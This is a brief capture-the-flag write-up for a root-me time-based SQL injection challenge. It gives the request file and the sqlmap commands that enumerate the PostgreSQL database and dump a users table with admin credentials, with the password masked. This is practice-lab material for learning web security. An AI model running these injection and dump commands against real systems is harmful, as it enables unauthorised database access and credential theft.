SQL injection: time-based

root-me challenge: SQL injection - Time based: Retrieve administrator’s password.

---

members.txt:

GET /web-serveur/ch40/?action=member&member=1* HTTP/1.1
Host: challenge01.root-me.org
...
Upgrade-Insecure-Requests: 1

sqlmap -r members.txt --risk=3 --level=5 --batch --dbs

URI parameter '#1*' is vulnerable.
the back-end DBMS is PostgreSQL
available databases [1]:
[*] public

sqlmap -r members.txt --risk=3 --level=1 --batch --dbs -D public --tables

Database: public
[1 table]
+-------+
| users |
+-------+

Dump:

sqlmap -r members.txt --risk=3 --level=1 --batch --dbs -D public --dump

+----+---------------------------+----------+---------------+----------+-----------+
| id | email                     | lastname | password      | username | firstname |
+----+---------------------------+----------+---------------+----------+-----------+
| 1  | ycam@sqlitimebased.com    | MAC      | xxxxxxxxxxxxx | admin    | Yann      |
+----+---------------------------+----------+---------------+----------+-----------+

Resources

• Time based blind SQL Injection using heavy queries

• SQLmap Cheatsheet and Examples